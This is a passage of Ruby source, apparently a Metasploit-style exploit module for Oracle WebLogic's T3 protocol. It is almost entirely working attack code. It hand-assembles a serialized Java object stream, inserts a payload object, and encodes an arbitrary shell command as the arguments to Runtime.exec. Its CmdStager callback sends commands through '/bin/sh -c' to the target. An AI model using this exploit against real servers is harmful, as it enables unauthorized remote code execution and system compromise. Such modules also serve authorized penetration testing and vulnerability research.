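    request_obj << '61746368'
    request_obj << '4c0009' # Field type: Object, field name length: 9
    request_obj << '696d706c5469746c65' # implTitle
    request_obj << '740012' # String, length: 18
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
    request_obj << '2f537472696e673b'
    request_obj << '4c000a' # Field type: Object, field name length: 10
    request_obj << '696d706c56656e646f72' # implVendor
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '4c000b' # Field type: Object, field name length: 11
    request_obj << '696d706c56657273696f6e' # implVersion
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    request_obj << '7702' # TC_BLOCKDATA, length: 2
    request_obj << '000078' # 2 data bytes, TC_ENDBLOCKDATA
    request_obj << 'fe010000' # separator

    request_obj << payload_obj

    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '001d' # Class name length: 29
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
    request_obj << '6a766d2e436c61737354'
    request_obj << '61626c65456e747279'
    request_obj << '2f52658157f4f9ed' # SerialVersionUID
    request_obj << '0c0000' # SC_BLOCK_DATA|SC_EXTERNALIZABLE, 0 fields
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
    request_obj << '0021' # Class name length: 33
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5065657249'
    request_obj << '6e666f'
    request_obj << '585474f39bc908f1' # SerialVersionUID
    request_obj << '020007' # SC_SERIALIZABLE, 7 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
    request_obj << '61746368'
    request_obj << '5b0008' # Field type: Array, field name length: 8
    request_obj << '7061636b61676573' # packages
    request_obj << '740027' # String, length: 39
    request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
    request_obj << '2f636f6d6d6f6e2f696e'
    request_obj << '7465726e616c2f506163'
    request_obj << '6b616765496e666f3b'
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5665727369'
    request_obj << '6f6e496e666f'
    request_obj << '972245516452463e' # SerialVersionUID
    request_obj << '020003' # SC_SERIALIZABLE, 3 fields
    request_obj << '5b0008' # Field type: Array, field name length: 8
    request_obj << '7061636b61676573' # packages
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '4c000e' # Field type: Object, field name length: 14
    request_obj << '72656c65617365566572' # releaseVersion
    request_obj << '73696f6e'
    request_obj << '740012' # String, length: 18
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
    request_obj << '2f537472696e673b'
    request_obj << '5b0012' # Field type: Array, field name length: 18
    request_obj << '76657273696f6e496e66' # versionInfoAsBytes
    request_obj << '6f41734279746573'
    request_obj << '740002' # String, length: 2
    request_obj << '5b42' # [B
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5061636b61'
    request_obj << '6765496e666f'
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
    request_obj << '020009' # SC_SERIALIZABLE, 9 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
    request_obj << '61746368'
    request_obj << '4c0009' # Field type: Object, field name length: 9
    request_obj << '696d706c5469746c65' # implTitle
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '4c000a' # Field type: Object, field name length: 10
    request_obj << '696d706c56656e646f72' # implVendor
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '4c000b' # Field type: Object, field name length: 11
    request_obj << '696d706c56657273696f' # implVersion
    request_obj << '6e'
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
    request_obj << 'fe00ff' # separator
    request_obj << 'fe010000'
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '0013' # Class name length: 19
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
    request_obj << '6a766d2e4a564d4944'
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
    request_obj << '0c0000' # SC_BLOCK_DATA|SC_EXTERNALIZABLE, 0 fields
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
    request_obj << '4621'
    request_obj << '000000000000000000'
    request_obj << '09' # length: 9
    request_obj << '3132372e302e312e31' # 127.0.1.1 (static, from the capture)
    request_obj << '000b' # length: 11
    request_obj << '75732d6c2d627265656e' # us-l-breens (static, from the capture)
    request_obj << '73'
    request_obj << 'a53caff10000000700'
    request_obj << '001b59'
    request_obj << 'ffffffffffffffffffff'
    request_obj << 'ffffffffffffffffffff'
    request_obj << 'ffffffff'
    request_obj << '0078'
    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '0013' # Class name length: 19
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
    request_obj << '6a766d2e4a564d4944'
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
    request_obj << '0c0000' # SC_BLOCK_DATA|SC_EXTERNALIZABLE, 0 fields
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
    request_obj << '1d0181401281'
    request_obj << '34bf427600093132372e' # ... "127.0.1.1" again
    request_obj << '302e312e31a53caff1'
    request_obj << '000000000078'

    # request_obj is hex text, so the byte length is half its character length;
    # patch it over the placeholder in the first 4 bytes.
    new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
    request_obj[0, 8] = new_len

    sock.put([request_obj].pack('H*'))
    sleep(1)
  end

  # Encodes the command as the three TC_STRING elements of the String[] that
  # build_payload_obj hands to Runtime.exec.
  #
  # @param payload_cmd [String] "<shell> <flag> <command>"; split on at most two
  #   spaces so the (space-containing) command stays one argument
  # @return [String] hex-encoded TC_STRING records
  def format_payload(payload_cmd)
    print_status('Formatting payload...')
    payload_arr = payload_cmd.split(' ', 3)

    # build_payload_obj hard-codes the String[] length as 3; emitting any other
    # number of elements would desynchronise the object stream.
    unless payload_arr.length == 3
      fail_with(Failure::BadConfig, "Expected '<shell> <flag> <command>', got #{payload_arr.length} argument(s)")
    end

    formatted_payload = ''
    payload_arr.each do |part|
      # TC_STRING carries a 16-bit byte length (bytes, not characters); a longer
      # argument would need TC_LONGSTRING, which this builder does not emit.
      len = part.bytesize
      if len > 0xffff
        fail_with(Failure::BadConfig, "Payload argument is #{len} bytes; TC_STRING allows at most 65535")
      end
      formatted_payload << '74' # TC_STRING
      formatted_payload << len.to_s(16).rjust(4, '0')
      formatted_payload << part.unpack('H*').first
    end

    formatted_payload
  end

  # CmdStager callback: runs one stager chunk through `/bin/sh -c`.
  #
  # Builds a new String rather than mutating the caller's `cmd`.
  def execute_command(cmd, _opts = {})
    t3_send(build_payload_obj("/bin/sh -c #{cmd}"))
  end
end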